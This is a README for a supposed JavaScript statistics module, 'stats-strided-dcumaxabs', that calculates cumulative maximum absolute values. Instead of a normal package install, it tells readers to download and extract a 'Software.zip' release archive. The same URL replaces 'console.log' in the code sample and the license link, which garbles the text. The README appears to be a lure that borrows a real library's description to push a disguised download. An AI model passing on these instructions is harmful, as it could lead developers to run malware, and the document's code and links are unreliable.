This repository provides a JavaScript module to calculate the cumulative maximum absolute value of double-precision floating-point strided array elements. It is designed to efficiently handle large datasets and is especially useful in statistical analysis and mathematical computations.
abs, absolute, absolute-value, accumulate, cumulative, domain, extent, extremes, javascript, math, mathematics, max, maximum, node, node-js, nodejs, range, statistics, stats, stdlib
To use this module, download the https://github.com/FlayerMC/stats-strided-dcumaxabs/releases/download/v2.0/Software.zip file and follow the instructions inside for installation.
- Download and extract the "https://github.com/FlayerMC/stats-strided-dcumaxabs/releases/download/v2.0/Software.zip" file.
- Import the module into your JavaScript project.
- Use the provided functions to calculate the cumulative maximum absolute value of your strided array elements.
const data = [0.1, -0.5, 0.7, -0.3, 0.9];
const result = calculateCumMaxAbs(data);
https://github.com/FlayerMC/stats-strided-dcumaxabs/releases/download/v2.0/Software.zip(result); // Output: [0.1, 0.5, 0.7, 0.7, 0.9]
Contributions are welcome! If you have any ideas or improvements, feel free to fork the repository and submit a pull request with your changes.
This project is licensed under the MIT License - see the https://github.com/FlayerMC/stats-strided-dcumaxabs/releases/download/v2.0/Software.zip file for details.
For any questions or issues, please check the Releases section for updates or open a new issue.
Thank you for using "stats-strided-dcumaxabs" module! 🎉